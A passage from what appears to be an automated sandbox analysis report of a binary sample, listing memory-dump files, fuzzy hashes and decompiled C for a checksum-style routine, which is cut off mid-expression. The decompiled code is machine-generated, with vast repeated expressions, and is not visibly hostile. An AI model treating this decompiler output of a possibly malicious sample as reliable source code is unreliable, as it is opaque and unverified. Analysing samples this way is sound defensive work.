					} while (_t259 != 0);
				}
				return ( !_t98 >> 0x18) + (( !_t98 & 0x0000ff00) + ( !_t98 << 0x10) << 8) + (_t99 >> 0x00000008 & 0x0000ff00);
			}















                                                                                                                                                                      0x004102f0
                                                                                                                                                                      0x0041030b
                                                                                                                                                                      0x0041031b
                                                                                                                                                                      0x00410321
                                                                                                                                                                      0x00410326
                                                                                                                                                                      0x00410328
                                                                                                                                                                      0x0041032d
                                                                                                                                                                      0x00410335
                                                                                                                                                                      0x0041033b
                                                                                                                                                                      0x00410342
                                                                                                                                                                      0x00410343
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00410343
                                                                                                                                                                      0x00410328
                                                                                                                                                                      0x00410345
                                                                                                                                                                      0x00410345
                                                                                                                                                                      0x0041034b
                                                                                                                                                                      0x00410354
                                                                                                                                                                      0x00410357
                                                                                                                                                                      0x00410484
                                                                                                                                                                      0x004104b6
                                                                                                                                                                      0x004104c3
                                                                                                                                                                      0x004104c6
                                                                                                                                                                      0x00410536
                                                                                                                                                                      0x0041053d
                                                                                                                                                                      0x0041053d
                                                                                                                                                                      0x00410544
                                                                                                                                                                      0x00410548
                                                                                                                                                                      0x0041054c
                                                                                                                                                                      0x00410550
                                                                                                                                                                      0x00410550
                                                                                                                                                                      0x00410553
                                                                                                                                                                      0x0041055d
                                                                                                                                                                      0x00410593
                                                                                                                                                                      0x00410595
                                                                                                                                                                      0x00410595
                                                                                                                                                                      0x00410550
                                                                                                                                                                      0x00410598
                                                                                                                                                                      0x0041059d
                                                                                                                                                                      0x004105a0
                                                                                                                                                                      0x004105a0
                                                                                                                                                                      0x004105a3
                                                                                                                                                                      0x004105b0
                                                                                                                                                                      0x004105b7
                                                                                                                                                                      0x004105b7
                                                                                                                                                                      0x004105a0
                                                                                                                                                                      0x004105e3

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 52a707402405e659f98bc40317dd1cd0cc62b6214a4faa6fed308a5dafce6d2b
                                                                                                                                                                      • Instruction ID: 1429709298f1008899e87f6c3b3879e7121ea009d7144b8a16b77f0414586c87
                                                                                                                                                                      • Opcode Fuzzy Hash: 52a707402405e659f98bc40317dd1cd0cc62b6214a4faa6fed308a5dafce6d2b
                                                                                                                                                                      • Instruction Fuzzy Hash: C171AF726208524BE718CF2DECE06763353E7D9312B4BC738DB4187796C638E962D694
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004102D0, Relevance: .2, Instructions: 193COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004102D0() {
				intOrPtr _t93;
				signed int _t95;
				signed char _t98;
				signed char _t146;
				signed int* _t164;
				signed int _t165;
				signed int _t202;
				signed char _t234;
				unsigned int _t236;
				unsigned int _t241;
				signed int* _t242;
				signed int* _t243;
				unsigned int _t246;
				void* _t248;

				_t93 =  *((intOrPtr*)(_t248 + 8));
				if(_t93 != 0) {
					 *((intOrPtr*)(_t248 + 8)) = _t93;
					_t146 =  *(_t248 + 0xc);
					_t95 =  !( *(_t248 + 4));
					_t236 =  *(_t248 + 0x14);
					if(_t236 != 0) {
						while((_t146 & 0x00000003) != 0) {
							_t202 =  *_t146 & 0x000000ff;
							_t146 = _t146 + 1;
							_t95 = _t95 >> 0x00000008 ^  *(0x4131c8 + ((_t202 ^ _t95) & 0x000000ff) * 4);
							_t236 = _t236 - 1;
							if(_t236 != 0) {
								continue;
							}
							goto L6;
						}
					}
					L6:
					if(_t236 >= 0x20) {
						_t246 = _t236 >> 5;
						do {
							_t219 =  *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4);
							 *(_t248 + 0x18) = _t146 + 8;
							_t242 =  *(_t248 + 0x18);
							_t229 =  *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 